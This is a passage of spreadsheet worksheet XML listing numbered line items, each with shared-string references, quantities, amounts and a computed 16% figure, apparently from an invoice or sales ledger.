        <v>4752</v>
      </c>
      <c r="E35" s="238" t="s">
        <v>4753</v>
      </c>
      <c r="F35" s="238" t="s">
        <v>4739</v>
      </c>
      <c r="G35" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H35" s="10">
        <v>8</v>
      </c>
      <c r="I35" s="14">
        <v>448.06</v>
      </c>
      <c r="J35" s="15">
        <v>71.6928</v>
      </c>
      <c r="K35" s="16"/>
    </row>
    <row r="36" spans="2:11">
      <c r="B36" s="9">
        <v>29</v>
      </c>
      <c r="C36" s="238" t="s">
        <v>4754</v>
      </c>
      <c r="D36" s="9"/>
      <c r="E36" s="238" t="s">
        <v>4755</v>
      </c>
      <c r="F36" s="238" t="s">
        <v>4739</v>
      </c>
      <c r="G36" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H36" s="10">
        <v>1</v>
      </c>
      <c r="I36" s="14">
        <v>1162.39</v>
      </c>
      <c r="J36" s="15">
        <v>185.9824</v>
      </c>
      <c r="K36" s="16"/>
    </row>
    <row r="37" spans="2:11">
      <c r="B37" s="9">
        <v>30</v>
      </c>
      <c r="C37" s="238" t="s">
        <v>4756</v>
      </c>
      <c r="D37" s="238" t="s">
        <v>4757</v>
      </c>
      <c r="E37" s="238" t="s">
        <v>4758</v>
      </c>
      <c r="F37" s="238" t="s">
        <v>4759</v>
      </c>
      <c r="G37" s="237" t="s">
        <v>4760</v>
      </c>
      <c r="H37" s="10">
        <v>2</v>
      </c>
      <c r="I37" s="14">
        <v>1310.54</v>
      </c>
      <c r="J37" s="15">
        <v>209.6864</v>
      </c>
      <c r="K37" s="16"/>
    </row>
    <row r="38" spans="2:11">
      <c r="B38" s="9">
        <v>31</v>
      </c>
      <c r="C38" s="238" t="s">
        <v>4761</v>
      </c>
      <c r="D38" s="238" t="s">
        <v>4762</v>
      </c>
      <c r="E38" s="238" t="s">
        <v>4763</v>
      </c>
      <c r="F38" s="238" t="s">
        <v>4739</v>
      </c>
      <c r="G38" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H38" s="10">
        <v>5</v>
      </c>
      <c r="I38" s="14">
        <v>356.06</v>
      </c>
      <c r="J38" s="15">
        <v>56.968</v>
      </c>
      <c r="K38" s="16"/>
    </row>
    <row r="39" spans="2:11">
      <c r="B39" s="9">
        <v>32</v>
      </c>
      <c r="C39" s="238" t="s">
        <v>4764</v>
      </c>
      <c r="D39" s="238" t="s">
        <v>4765</v>
      </c>
      <c r="E39" s="238" t="s">
        <v>4766</v>
      </c>
      <c r="F39" s="238" t="s">
        <v>4739</v>
      </c>
      <c r="G39" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H39" s="10">
        <v>4</v>
      </c>
      <c r="I39" s="14">
        <v>444.1</v>
      </c>
      <c r="J39" s="15">
        <v>71.0592</v>
      </c>
      <c r="K39" s="16"/>
    </row>
    <row r="40" spans="2:11">
      <c r="B40" s="9">
        <v>33</v>
      </c>
      <c r="C40" s="238" t="s">
        <v>4767</v>
      </c>
      <c r="D40" s="238" t="s">
        <v>4768</v>
      </c>
      <c r="E40" s="238" t="s">
        <v>4685</v>
      </c>
      <c r="F40" s="9"/>
      <c r="G40" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H40" s="10">
        <v>9</v>
      </c>
      <c r="I40" s="14">
        <v>699.44</v>
      </c>
      <c r="J40" s="15">
        <v>111.9168</v>
      </c>
      <c r="K40" s="16"/>
    </row>
    <row r="41" spans="2:11">
      <c r="B41" s="9">
        <v>34</v>
      </c>
      <c r="C41" s="238" t="s">
        <v>4769</v>
      </c>
      <c r="D41" s="238" t="s">
        <v>4770</v>
      </c>
      <c r="E41" s="238" t="s">
        <v>4771</v>
      </c>
      <c r="F41" s="9"/>
      <c r="G41" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H41" s="10">
        <v>3</v>
      </c>
      <c r="I41" s="14">
        <v>307.69</v>
      </c>
      <c r="J41" s="15">
        <v>49.2288</v>
      </c>
      <c r="K41" s="16"/>
    </row>
    <row r="42" spans="2:11">
      <c r="B42" s="9">
        <v>35</v>
      </c>
      <c r="C42" s="238" t="s">
        <v>4772</v>
      </c>
      <c r="D42" s="9"/>
      <c r="E42" s="238" t="s">
        <v>4773</v>
      </c>
      <c r="F42" s="9"/>
      <c r="G42" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H42" s="10">
        <v>15</v>
      </c>
      <c r="I42" s="14">
        <v>1025.63</v>
      </c>
      <c r="J42" s="15">
        <v>164.112</v>
      </c>
      <c r="K42" s="16"/>
    </row>
    <row r="43" spans="2:11">
      <c r="B43" s="9">
        <v>36</v>
      </c>
      <c r="C43" s="238" t="s">
        <v>4774</v>
      </c>
      <c r="D43" s="9"/>
      <c r="E43" s="238" t="s">
        <v>4775</v>
      </c>
      <c r="F43" s="9"/>
      <c r="G43" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H43" s="10">
        <v>23</v>
      </c>
      <c r="I43" s="14">
        <v>18576.96</v>
      </c>
      <c r="J43" s="15">
        <v>2972.2992</v>
      </c>
      <c r="K43" s="16"/>
    </row>
    <row r="44" spans="2:11">
      <c r="B44" s="9">
        <v>37</v>
      </c>
      <c r="C44" s="238" t="s">
        <v>4776</v>
      </c>
      <c r="D44" s="238" t="s">
        <v>4777</v>
      </c>
      <c r="E44" s="238" t="s">
        <v>4778</v>
      </c>
      <c r="F44" s="238" t="s">
        <v>4779</v>
      </c>
      <c r="G44" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H44" s="10">
        <v>1</v>
      </c>
      <c r="I44" s="14">
        <v>1794.87</v>
      </c>
      <c r="J44" s="15">
        <v>287.1792</v>
      </c>
      <c r="K44" s="16"/>
    </row>
    <row r="45" spans="2:11">
      <c r="B45" s="9">
        <v>38</v>
      </c>
      <c r="C45" s="238" t="s">
        <v>4780</v>
      </c>
      <c r="D45" s="238" t="s">
        <v>4781</v>
      </c>
      <c r="E45" s="238" t="s">
        <v>4782</v>
      </c>
      <c r="F45" s="9"/>
      <c r="G45" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H45" s="10">
        <v>4</v>
      </c>
      <c r="I45" s="14">
        <v>294.45</v>
      </c>
      <c r="J45" s="15">
        <v>47.1104</v>
      </c>
      <c r="K45" s="16"/>
    </row>
    <row r="46" spans="2:11">
      <c r="B46" s="9">
        <v>39</v>
      </c>
      <c r="C46" s="238" t="s">
        <v>4783</v>
      </c>
      <c r="D46" s="238" t="s">
        <v>4784</v>
      </c>
      <c r="E46" s="238" t="s">
        <v>4785</v>
      </c>
      <c r="F46" s="238" t="s">
        <v>4786</v>
      </c>
      <c r="G46" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H46" s="10">
        <v>72</v>
      </c>
      <c r="I46" s="14">
        <v>23384.62</v>
      </c>
      <c r="J46" s="15">
        <v>3741.5808</v>
      </c>
      <c r="K46" s="16"/>
    </row>
    <row r="47" spans="2:11">
      <c r="B47" s="9">
        <v>40</v>
      </c>
      <c r="C47" s="238" t="s">
        <v>4787</v>
      </c>
      <c r="D47" s="238" t="s">
        <v>4788</v>
      </c>
      <c r="E47" s="238" t="s">
        <v>4789</v>
      </c>
      <c r="F47" s="9"/>
      <c r="G47" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H47" s="10">
        <v>40</v>
      </c>
      <c r="I47" s="14">
        <v>854.7</v>
      </c>
      <c r="J47" s="15">
        <v>136.768</v>
      </c>
      <c r="K47" s="16"/>
    </row>
    <row r="48" spans="2:11">
      <c r="B48" s="9">
        <v>41</v>
      </c>
      <c r="C48" s="238" t="s">
        <v>4790</v>
      </c>
      <c r="D48" s="238" t="s">
        <v>4791</v>
      </c>
      <c r="E48" s="238" t="s">
        <v>4792</v>
      </c>
      <c r="F48" s="238" t="s">
        <v>4793</v>
      </c>
      <c r="G48" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H48" s="10">
        <v>69</v>
      </c>
      <c r="I48" s="14">
        <v>2917.37</v>
      </c>
      <c r="J48" s="15">
        <v>466.7712</v>
      </c>
      <c r="K48" s="16"/>
    </row>
    <row r="49" spans="2:11">
      <c r="B49" s="9">
        <v>42</v>
      </c>
      <c r="C49" s="238" t="s">
        <v>4794</v>
      </c>
      <c r="D49" s="9"/>
      <c r="E49" s="238" t="s">
        <v>4795</v>
      </c>
      <c r="F49" s="238" t="s">
        <v>4796</v>
      </c>
      <c r="G49" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H49" s="10">
        <v>10</v>
      </c>
      <c r="I49" s="14">
        <v>555.56</v>
      </c>
      <c r="J49" s="15">
        <v>88.896</v>
      </c>
      <c r="K49" s="16"/>
    </row>
    <row r="50" spans="2:11">
      <c r="B50" s="9">
        <v>43</v>
      </c>
      <c r="C50" s="238" t="s">
        <v>4797</v>
      </c>
      <c r="D50" s="9"/>
      <c r="E50" s="238" t="s">
        <v>4792</v>
      </c>
      <c r="F50" s="238" t="s">
        <v>4793</v>
      </c>
      <c r="G50" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H50" s="10">
        <v>5</v>
      </c>
      <c r="I50" s="14">
        <v>3867.52</v>
      </c>
      <c r="J50" s="15">
        <v>618.8</v>
      </c>
      <c r="K50" s="16"/>
    </row>
    <row r="51" spans="2:11">
      <c r="B51" s="9">
        <v>44</v>
      </c>
      <c r="C51" s="238" t="s">
        <v>4798</v>
      </c>
      <c r="D51" s="9"/>
      <c r="E51" s="238" t="s">
        <v>4799</v>
      </c>
      <c r="F51" s="238" t="s">
        <v>4800</v>
      </c>
      <c r="G51" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H51" s="10">
        <v>4</v>
      </c>
      <c r="I51" s="14">
        <v>1222.21</v>
      </c>
      <c r="J51" s="15">
        <v>195.552</v>
      </c>
      <c r="K51" s="16"/>
    </row>
    <row r="52" spans="2:11">
      <c r="B52" s="9">
        <v>45</v>
      </c>
      <c r="C52" s="238" t="s">
        <v>4801</v>
      </c>
      <c r="D52" s="9"/>
      <c r="E52" s="238" t="s">
        <v>4802</v>
      </c>
      <c r="F52" s="9"/>
      <c r="G52" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H52" s="10">
        <v>4</v>
      </c>
      <c r="I52" s="14">
        <v>1613.65</v>
      </c>
      <c r="J52" s="15">
        <v>258.1824</v>
      </c>
      <c r="K52" s="16"/>
    </row>
    <row r="53" spans="2:11">
      <c r="B53" s="9">
        <v>46</v>
      </c>
      <c r="C53" s="238" t="s">
        <v>4803</v>
      </c>
      <c r="D53" s="9"/>
      <c r="E53" s="238" t="s">
        <v>4804</v>
      </c>
      <c r="F53" s="238" t="s">
        <v>4805</v>
      </c>
      <c r="G53" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H53" s="10">
        <v>50</v>
      </c>
      <c r="I53" s="14">
        <v>8119.66</v>
      </c>
      <c r="J53" s="15">
        <v>1299.12</v>
      </c>
      <c r="K53" s="16"/>
    </row>
    <row r="54" spans="2:11">
      <c r="B54" s="9">
        <v>47</v>
      </c>
      <c r="C54" s="238" t="s">
        <v>4806</v>
      </c>
      <c r="D54" s="238" t="s">
        <v>4807</v>
      </c>
      <c r="E54" s="238" t="s">
        <v>4808</v>
      </c>
      <c r="F54" s="238" t="s">
        <v>4809</v>
      </c>
      <c r="G54" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H54" s="10">
        <v>4</v>
      </c>
      <c r="I54" s="14">
        <v>159.53</v>
      </c>
      <c r="J54" s="15">
        <v>25.5232</v>
      </c>
      <c r="K54" s="16"/>
    </row>
    <row r="55" spans="2:11">
      <c r="B55" s="9">
        <v>48</v>
      </c>
      <c r="C55" s="238" t="s">
        <v>4810</v>
      </c>
      <c r="D55" s="238" t="s">
        <v>4811</v>
      </c>
      <c r="E55" s="238" t="s">
        <v>4812</v>
      </c>
      <c r="F55" s="9"/>
      <c r="G55" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H55" s="10">
        <v>8</v>
      </c>
      <c r="I55" s="14">
        <v>328.21</v>
      </c>
      <c r="J55" s="15">
        <v>52.5184</v>
      </c>
      <c r="K55" s="16"/>
    </row>
    <row r="56" spans="2:11">
      <c r="B56" s="9">
        <v>49</v>
      </c>
      <c r="C56" s="238" t="s">
        <v>4813</v>
      </c>
      <c r="D56" s="9"/>
      <c r="E56" s="238" t="s">
        <v>4814</v>
      </c>
      <c r="F56" s="9"/>
      <c r="G56" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H56" s="10">
        <v>1</v>
      </c>
      <c r="I56" s="14">
        <v>81.2</v>
      </c>
      <c r="J56" s="15">
        <v>12.992</v>
      </c>
      <c r="K56" s="16"/>
    </row>
    <row r="57" spans="2:11">
      <c r="B57" s="9">
        <v>50</v>
      </c>
      <c r="C57" s="238" t="s">
        <v>4815</v>
      </c>
      <c r="D57" s="238" t="s">
        <v>4816</v>
      </c>
      <c r="E57" s="238" t="s">
        <v>4817</v>
      </c>
      <c r="F57" s="238" t="s">
        <v>4818</v>
      </c>
      <c r="G57" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H57" s="10">
        <v>9</v>
      </c>
      <c r="I57" s="14">
        <v>46.18</v>
      </c>
      <c r="J57" s="15">
        <v>7.3872</v>
      </c>
      <c r="K57" s="16"/>
    </row>
    <row r="58" spans="2:11">
      <c r="B58" s="9">
        <v>51</v>
      </c>
      <c r="C58" s="238" t="s">
        <v>4819</v>
      </c>
      <c r="D58" s="238" t="s">
        <v>4820</v>
      </c>
      <c r="E58" s="238" t="s">
        <v>4821</v>
      </c>
      <c r="F58" s="238" t="s">
        <v>4822</v>
      </c>
      <c r="G58" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H58" s="10">
        <v>3</v>
      </c>
      <c r="I58" s="14">
        <v>25.64</v>
      </c>
      <c r="J58" s="15">
        <v>4.104</v>
      </c>
      <c r="K58" s="16"/>
    </row>
    <row r="59" spans="2:11">
      <c r="B59" s="9">
        <v>52</v>
      </c>
      <c r="C59" s="238" t="s">
        <v>4823</v>
      </c>
      <c r="D59" s="238" t="s">
        <v>4824</v>
      </c>
      <c r="E59" s="238" t="s">
        <v>4825</v>
      </c>
      <c r="F59" s="238" t="s">
        <v>4822</v>
      </c>
      <c r="G59" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H59" s="10">
        <v>3</v>
      </c>
      <c r="I59" s="14">
        <v>2301.28</v>
      </c>
      <c r="J59" s="15">
        <v>368.2032</v>
      </c>
      <c r="K59" s="16"/>
    </row>
    <row r="60" spans="2:11">
      <c r="B60" s="9">
        <v>53</v>
      </c>
      <c r="C60" s="238" t="s">
        <v>4826</v>
      </c>
      <c r="D60" s="238" t="s">
        <v>4827</v>
      </c>
      <c r="E60" s="238" t="s">
        <v>4828</v>
      </c>
      <c r="F60" s="9"/>
      <c r="G60" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H60" s="10">
        <v>2</v>
      </c>
      <c r="I60" s="14">
        <v>512.82</v>
      </c>
      <c r="J60" s="15">
        <v>82.0512</v>
      </c>
      <c r="K60" s="16"/>
    </row>
    <row r="61" spans="2:11">
      <c r="B61" s="9">
        <v>57</v>
      </c>
      <c r="C61" s="238" t="s">
        <v>4829</v>
      </c>
      <c r="D61" s="238" t="s">
        <v>4830</v>
      </c>
      <c r="E61" s="238" t="s">
        <v>4831</v>
      </c>
      <c r="F61" s="238" t="s">
        <v>4537</v>
      </c>
      <c r="G61" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H61" s="10">
        <v>43</v>
      </c>
      <c r="I61" s="14">
        <v>1379.14</v>
      </c>
      <c r="J61" s="15">
        <v>220.6416</v>
      </c>
      <c r="K61" s="16"/>
    </row>
    <row r="62" spans="2:11">
      <c r="B62" s="9">
        <v>58</v>
      </c>
      <c r="C62" s="238" t="s">
        <v>4832</v>
      </c>
      <c r="D62" s="238" t="s">
        <v>4833</v>
      </c>
      <c r="E62" s="238" t="s">
        <v>4834</v>
      </c>
      <c r="F62" s="238" t="s">
        <v>4537</v>
      </c>
      <c r="G62" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H62" s="10">
        <v>8</v>
      </c>
      <c r="I62" s="14">
        <v>199.61</v>
      </c>
      <c r="J62" s="15">
        <v>31.936</v>
      </c>
      <c r="K62" s="16"/>
    </row>
    <row r="63" spans="2:11">
      <c r="B63" s="9">
        <v>59</v>
      </c>
      <c r="C63" s="238" t="s">
        <v>4835</v>
      </c>
      <c r="D63" s="238" t="s">
        <v>4836</v>
      </c>
      <c r="E63" s="238" t="s">
        <v>4837</v>
      </c>
      <c r="F63" s="238" t="s">
        <v>4537</v>
      </c>
      <c r="G63" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H63" s="10">
        <v>11</v>
      </c>
      <c r="I63" s="14">
        <v>330.44</v>
      </c>
      <c r="J63" s="15">
        <v>52.8704</v>
      </c>
      <c r="K63" s="16"/>
    </row>
    <row r="64" spans="2:11">
      <c r="B64" s="9">
        <v>60</v>
      </c>
      <c r="C64" s="238" t="s">
        <v>4838</v>
      </c>
      <c r="D64" s="238" t="s">
        <v>4839</v>
      </c>
      <c r="E64" s="238" t="s">
        <v>4840</v>
      </c>
      <c r="F64" s="238" t="s">
        <v>4537</v>
      </c>
      <c r="G64" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H64" s="10">
        <v>7</v>
      </c>
      <c r="I64" s="14">
        <v>2313.39</v>
      </c>
      <c r="J64" s="15">
        <v>370.1376</v>
      </c>
      <c r="K64" s="16"/>
    </row>
    <row r="65" spans="2:11">
      <c r="B65" s="9">
        <v>61</v>
      </c>
      <c r="C65" s="238" t="s">
        <v>4841</v>
      </c>
      <c r="D65" s="9"/>
      <c r="E65" s="238" t="s">
        <v>4842</v>
      </c>
      <c r="F65" s="238" t="s">
        <v>4537</v>
      </c>
      <c r="G65" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H65" s="10">
        <v>2</v>
      </c>
      <c r="I65" s="14">
        <v>1623.93</v>
      </c>
      <c r="J65" s="15">
        <v>259.8304</v>
      </c>
      <c r="K65" s="16"/>
    </row>
    <row r="66" spans="2:11">
      <c r="B66" s="9">
        <v>62</v>
      </c>
      <c r="C66" s="238" t="s">
        <v>4843</v>
      </c>
      <c r="D66" s="238" t="s">
        <v>4844</v>
      </c>
      <c r="E66" s="238" t="s">
        <v>4831</v>
      </c>
      <c r="F66" s="238" t="s">
        <v>2528</v>
      </c>
      <c r="G66" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H66" s="10">
        <v>17</v>
      </c>
      <c r="I66" s="14">
        <v>613.99</v>
      </c>
      <c r="J66" s="15">
        <v>98.2464</v>
      </c>
      <c r="K66" s="16"/>
    </row>
    <row r="67" spans="2:11">
      <c r="B67" s="9">
        <v>63</v>
      </c>
      <c r="C67" s="238" t="s">
        <v>4845</v>
      </c>
      <c r="D67" s="238" t="s">
        <v>4846</v>
      </c>
      <c r="E67" s="238" t="s">
        <v>4834</v>
      </c>
      <c r="F67" s="238" t="s">
        <v>2528</v>
      </c>
      <c r="G67" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H67" s="10">
        <v>20</v>
      </c>
      <c r="I67" s="14">
        <v>229.98</v>
      </c>
      <c r="J67" s="15">
        <v>36.8</v>
      </c>
      <c r="K67" s="16"/>
    </row>
    <row r="68" spans="2:11">
      <c r="B68" s="9">
        <v>64</v>
      </c>
      <c r="C68" s="238" t="s">
        <v>4847</v>
      </c>
      <c r="D68" s="238" t="s">
        <v>4848</v>
      </c>
      <c r="E68" s="238" t="s">
        <v>4837</v>
      </c>
      <c r="F68" s="238" t="s">
        <v>2528</v>
      </c>
      <c r="G68" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H68" s="10">
        <v>14</v>
      </c>
      <c r="I68" s="14">
        <v>263.96</v>
      </c>
      <c r="J68" s="15">
        <v>42.224</v>
      </c>
      <c r="K68" s="16"/>
    </row>
    <row r="69" spans="2:11">
      <c r="B69" s="9">
        <v>65</v>
      </c>
      <c r="C69" s="238" t="s">
        <v>4849</v>
      </c>
      <c r="D69" s="238" t="s">
        <v>4850</v>
      </c>
      <c r="E69" s="238" t="s">
        <v>4851</v>
      </c>
      <c r="F69" s="238" t="s">
        <v>2528</v>
      </c>
      <c r="G69" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H69" s="10">
        <v>8</v>
      </c>
      <c r="I69" s="14">
        <v>37.62</v>
      </c>
      <c r="J69" s="15">
        <v>6.016</v>
      </c>
      <c r="K69" s="16"/>
    </row>
    <row r="70" spans="2:11">
      <c r="B70" s="9">
        <v>66</v>
      </c>
      <c r="C70" s="238" t="s">
        <v>4852</v>
      </c>
      <c r="D70" s="238" t="s">
        <v>4853</v>
      </c>
      <c r="E70" s="238" t="s">
        <v>4854</v>
      </c>
      <c r="F70" s="238" t="s">
        <v>2528</v>
      </c>
      <c r="G70" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H70" s="10">
        <v>15</v>
      </c>
      <c r="I70" s="14">
        <v>760.68</v>
      </c>
      <c r="J70" s="15">
        <v>121.704</v>
      </c>
      <c r="K70" s="16"/>
    </row>
    <row r="71" spans="2:11">
      <c r="B71" s="9">
        <v>67</v>
      </c>
      <c r="C71" s="238" t="s">
        <v>4855</v>
      </c>
      <c r="D71" s="238" t="s">
        <v>4856</v>
      </c>
      <c r="E71" s="238" t="s">
        <v>4840</v>
      </c>
      <c r="F71" s="238" t="s">
        <v>2528</v>
      </c>
      <c r="G71" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H71" s="10">
        <v>1</v>
      </c>
      <c r="I71" s="14">
        <v>367.52</v>
      </c>
      <c r="J71" s="15">
        <v>58.8032</v>
      </c>
      <c r="K71" s="16"/>
    </row>
    <row r="72" spans="2:11">
      <c r="B72" s="9">
        <v>68</v>
      </c>
      <c r="C72" s="238" t="s">
        <v>4857</v>
      </c>
      <c r="D72" s="238" t="s">
        <v>4858</v>
      </c>
      <c r="E72" s="238" t="s">
        <v>4859</v>
      </c>
      <c r="F72" s="238" t="s">
        <v>2528</v>
      </c>
      <c r="G72" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H72" s="10">
        <v>2</v>
      </c>
      <c r="I72" s="14">
        <v>810.09</v>
      </c>
      <c r="J72" s="15">
        <v>129.616</v>
      </c>
      <c r="K72" s="16"/>
    </row>
    <row r="73" spans="2:11">
      <c r="B73" s="9">
        <v>69</v>
      </c>
      <c r="C73" s="238" t="s">
        <v>4860</v>
      </c>
      <c r="D73" s="238" t="s">
        <v>4861</v>
      </c>
      <c r="E73" s="238" t="s">
        <v>4862</v>
      </c>
      <c r="F73" s="238" t="s">
        <v>2528</v>
      </c>
      <c r="G73" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H73" s="10">
        <v>7</v>
      </c>
      <c r="I73" s="14">
        <v>2146.37</v>
      </c>
      <c r="J73" s="15">
        <v>343.4144</v>
      </c>
      <c r="K73" s="16"/>
    </row>
    <row r="74" spans="2:11">
      <c r="B74" s="9">
        <v>70</v>
      </c>
      <c r="C74" s="238" t="s">
        <v>4863</v>
      </c>
      <c r="D74" s="238" t="s">
        <v>4864</v>
      </c>
      <c r="E74" s="238" t="s">
        <v>4842</v>
      </c>
      <c r="F74" s="238" t="s">
        <v>2528</v>
      </c>
      <c r="G74" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H74" s="10">
        <v>2</v>
      </c>
      <c r="I74" s="14">
        <v>290.6</v>
      </c>
      <c r="J74" s="15">
        <v>46.496</v>
      </c>
      <c r="K74" s="16"/>
    </row>
    <row r="75" spans="2:11">
      <c r="B75" s="9">
        <v>71</v>
      </c>
      <c r="C75" s="238" t="s">
        <v>4865</v>
      </c>
      <c r="D75" s="238" t="s">
        <v>4844</v>
      </c>
      <c r="E75" s="238" t="s">
        <v>4831</v>
      </c>
      <c r="F75" s="238" t="s">
        <v>792</v>
      </c>
      <c r="G75" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H75" s="10">
        <v>5</v>
      </c>
      <c r="I75" s="14">
        <v>283.15</v>
      </c>
      <c r="J75" s="15">
        <v>45.304</v>
      </c>
      <c r="K75" s="16"/>
    </row>
    <row r="76" spans="2:11">
      <c r="B76" s="9">
        <v>72</v>
      </c>
      <c r="C76" s="238" t="s">
        <v>4866</v>
      </c>
      <c r="D76" s="238" t="s">
        <v>4867</v>
      </c>
      <c r="E76" s="238" t="s">
        <v>4834</v>
      </c>
      <c r="F76" s="238" t="s">
        <v>792</v>
      </c>
      <c r="G76" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H76" s="10">
        <v>20</v>
      </c>
      <c r="I76" s="14">
        <v>434.01</v>
      </c>
      <c r="J76" s="15">
        <v>69.44</v>
      </c>
      <c r="K76" s="16"/>
    </row>
    <row r="77" spans="2:11">
      <c r="B77" s="9">
        <v>73</v>
      </c>
      <c r="C77" s="238" t="s">
        <v>4868</v>
      </c>
      <c r="D77" s="238" t="s">
        <v>4848</v>
      </c>
      <c r="E77" s="238" t="s">
        <v>4837</v>
      </c>
      <c r="F77" s="238" t="s">
        <v>792</v>
      </c>
      <c r="G77" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H77" s="10">
        <v>5</v>
      </c>
      <c r="I77" s="14">
        <v>154.26</v>
      </c>
      <c r="J77" s="15">
        <v>24.68</v>
      </c>
      <c r="K77" s="16"/>
    </row>
    <row r="78" spans="2:11">
      <c r="B78" s="9">
        <v>74</v>
      </c>
      <c r="C78" s="238" t="s">
        <v>4869</v>
      </c>
      <c r="D78" s="238" t="s">
        <v>4870</v>
      </c>
      <c r="E78" s="238" t="s">
        <v>4854</v>
      </c>
      <c r="F78" s="238" t="s">
        <v>792</v>
      </c>
      <c r="G78" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H78" s="10">
        <v>4</v>
      </c>
      <c r="I78" s="14">
        <v>365.14</v>
      </c>
      <c r="J78" s="15">
        <v>58.4256</v>
      </c>
      <c r="K78" s="16"/>
    </row>
    <row r="79" spans="2:11">
      <c r="B79" s="9">
        <v>75</v>
      </c>
      <c r="C79" s="238" t="s">
        <v>4871</v>
      </c>
      <c r="D79" s="238" t="s">
        <v>4872</v>
      </c>
      <c r="E79" s="238" t="s">
        <v>4840</v>
      </c>
      <c r="F79" s="238" t="s">
        <v>792</v>
      </c>
      <c r="G79" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H79" s="10">
        <v>1</v>
      </c>
      <c r="I79" s="14">
        <v>461.54</v>
      </c>
      <c r="J79" s="15">
        <v>73.8464</v>
      </c>
      <c r="K79" s="16"/>
    </row>
    <row r="80" spans="2:11">
      <c r="B80" s="9">
        <v>76</v>
      </c>
      <c r="C80" s="238" t="s">
        <v>4873</v>
      </c>
      <c r="D80" s="238" t="s">
        <v>4874</v>
      </c>
      <c r="E80" s="238" t="s">
        <v>4875</v>
      </c>
      <c r="F80" s="238" t="s">
        <v>792</v>
      </c>
      <c r="G80" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H80" s="10">
        <v>3</v>
      </c>
      <c r="I80" s="14">
        <v>1136.75</v>
      </c>
      <c r="J80" s="15">
        <v>181.8816</v>
      </c>
      <c r="K80" s="16"/>
    </row>
    <row r="81" spans="2:11">
      <c r="B81" s="9">
        <v>77</v>
      </c>
      <c r="C81" s="238" t="s">
        <v>4876</v>
      </c>
      <c r="D81" s="238" t="s">
        <v>4877</v>
      </c>
      <c r="E81" s="238" t="s">
        <v>4878</v>
      </c>
      <c r="F81" s="238" t="s">
        <v>792</v>
      </c>
      <c r="G81" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H81" s="10">
        <v>3</v>
      </c>
      <c r="I81" s="14">
        <v>307.69</v>
      </c>
      <c r="J81" s="15">
        <v>49.2288</v>
      </c>
      <c r="K81" s="16"/>
    </row>
    <row r="82" spans="2:11">
      <c r="B82" s="9">
        <v>78</v>
      </c>
      <c r="C82" s="238" t="s">
        <v>4879</v>
      </c>
      <c r="D82" s="9"/>
      <c r="E82" s="238" t="s">
        <v>4842</v>
      </c>
      <c r="F82" s="238" t="s">
        <v>792</v>
      </c>
      <c r="G82" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H82" s="10">
        <v>3</v>
      </c>
      <c r="I82" s="14">
        <v>717.95</v>
      </c>
      <c r="J82" s="15">
        <v>114.8736</v>
      </c>
      <c r="K82" s="16"/>
    </row>
    <row r="83" spans="2:11">
      <c r="B83" s="9">
        <v>79</v>
      </c>
      <c r="C83" s="238" t="s">
        <v>4880</v>
      </c>
      <c r="D83" s="9"/>
      <c r="E83" s="238" t="s">
        <v>4685</v>
      </c>
      <c r="F83" s="238" t="s">
        <v>4697</v>
      </c>
      <c r="G83" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H83" s="10">
        <v>6</v>
      </c>
      <c r="I83" s="14">
        <v>307.7</v>
      </c>
      <c r="J83" s="15">
        <v>49.2288</v>
      </c>
      <c r="K83" s="16"/>
    </row>
    <row r="84" spans="2:11">
      <c r="B84" s="9">
        <v>80</v>
      </c>
      <c r="C84" s="238" t="s">
        <v>4881</v>
      </c>
      <c r="D84" s="9"/>
      <c r="E84" s="238" t="s">
        <v>4882</v>
      </c>
      <c r="F84" s="238" t="s">
        <v>4571</v>
      </c>
      <c r="G84" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H84" s="10">
        <v>2</v>
      </c>
      <c r="I84" s="14">
        <v>264.96</v>
      </c>
      <c r="J84" s="15">
        <v>42.3936</v>
      </c>
      <c r="K84" s="16"/>
    </row>
    <row r="85" spans="2:11">
      <c r="B85" s="9">
        <v>81</v>
      </c>
      <c r="C85" s="238" t="s">
        <v>4883</v>
      </c>
      <c r="D85" s="9"/>
      <c r="E85" s="238" t="s">
        <v>4884</v>
      </c>
